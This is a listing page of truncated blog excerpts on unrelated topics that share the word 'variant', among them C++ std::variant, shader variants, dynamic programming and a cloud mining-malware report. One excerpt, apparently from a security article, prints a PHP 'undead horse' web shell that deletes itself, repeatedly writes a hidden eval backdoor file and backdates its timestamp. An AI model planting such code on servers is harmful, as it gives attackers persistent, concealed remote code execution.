(C++17) Variant usage compared with union

Article directory Preface and requirements union memory map C++11 union use ref example structure Ordinary structure Blanking emplace monostate access std::get std::holds_alternative Get pointer std::get_if Get the optional number std::variant_size END Foreword and requirements Union is a concept that has existed since the C language era. Mainly used in some scenarios with large memory limitations. […]

Bug resolved: Invariant Violation: Element type is invalid: expected a string (for built-in components) or

Blogger Maotouhu () takes you to Go to New World? Blog homepage: Maotouhu’s blog “Complete Column of Interview Questions” Articles with pictures and texts Vivid images Simple and easy to learn! Everyone is welcome to step in~ “IDEA Development Cheats Column” Learn the common operations of IDEA and double your work efficiency~ “Master Golang in […]

New variant of the Givemexyz mining family is wreaking havoc on the cloud

1. Overview Alibaba Cloud Security Center has monitored that the givemexyz mining family continues to be active on the cloud. This family spreads by using weak server passwords, web vulnerabilities, middleware vulnerabilities, etc. Moreover, this family uses bash, python, powershell and other malicious scripts to conduct batch attacks, and has the ability to spread across […]

Modality-invariant Visual Odometry for Embodied Vision code reproduction (using docker)

Code address https://github.com/memmelma/VO-Transformer/tree/dev Environment configuration 1. Pull the github library git clone https://github.com/memmelma/VO-Transformer.git cd VO-Transformer/ 2. Create an environment Create environment.yml name: vot_nav channels: – pytorch -conda-forge dependencies: -python=3.7 -cmake=3.14.0 – numpy – numba -tqdm -tbb – joblib – h5py -pytorch=1.10.0 -torchvision=0.8.0 -cudatoolkit=11.0 – pip -pip: -yacs – lz4 -opencv-python -future – numba – numpy […]

Dynamically adjusting the system theme color (4): Exploration of CssVar and Variant solutions

Dynamic adjustment of system theme color (4): Exploration of CssVar and Variant solutions Dynamically adjusting the system theme color (4): Exploration of CssVar and Variant solutions Preface Introduction and comparison of plans CssVar (CSS variable scheme) Combination of CSS variable scheme and tailwindcss Variant plan Examples of 2 solutions on mini programs Previous articles Foreword […]

Utilization and restraint of undead horses (based on conditional competition) and variant undead horses

The immortal horse is a memory horse. It will be written into the process and generate Trojan files in the specified directory indefinitely. Here is the PHP Immortal Horse as an example Test code: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = ‘.test.php’; $code = ‘<?php if(md5($_GET[“pass”])==”098f6bcd4621d373cade4e832627b4f6″){@eval($_POST[test]);} ?>’; while (1){ file_put_contents($file,$code); system(‘touch -m -d “2018-12-01 09:10:12” .test.php’); […]

Shader variant tailoring (already commercialized project practice)

Foreword When the author was developing a heavy-duty SLG project, because the large map in the project used real-time lighting, Lightmap, fog effects, etc., there were many lighting-related Shader variants. It took several hours to compile the Shader variants during packaging. , and found that the mobile platform occupies a large amount of memory during […]

ACM | Dynamic Programming-Number Tower Problem Variants

Foreword The number tower problem is also known as the number triangle and number pyramid problem. The number tower problem is a common and important type of problem in multi-dimensional dynamic programming problems. It has many variants and the difficulty ranges from low to high. Mastering the algorithmic thinking of this type of problem is […]

C++ std::holds_alternative, std::get, std::variant application examples (219)

Introduction: CSDN blog expert, focusing on Android/Linux System, share multi-mic voice solutions, audio and video, codec and other technologies, and grow with everyone! Quality Column:Audio Engineer Advanced Series[Original information is being updated continuously… ] Life motto: There are never shortcuts in life, only actions It is the only cure for fear and laziness. For more […]

SIFT (Scale-Invariant Feature Transform) in computer vision algorithms

Introduction Computer vision is one of the fields that has developed rapidly in recent years. It involves the understanding and analysis of images and videos. Image feature extraction is one of the important tasks in computer vision. SIFT (Scale-Invariant Feature Transform) is a commonly used image feature extraction algorithm. It has the characteristics of scale […]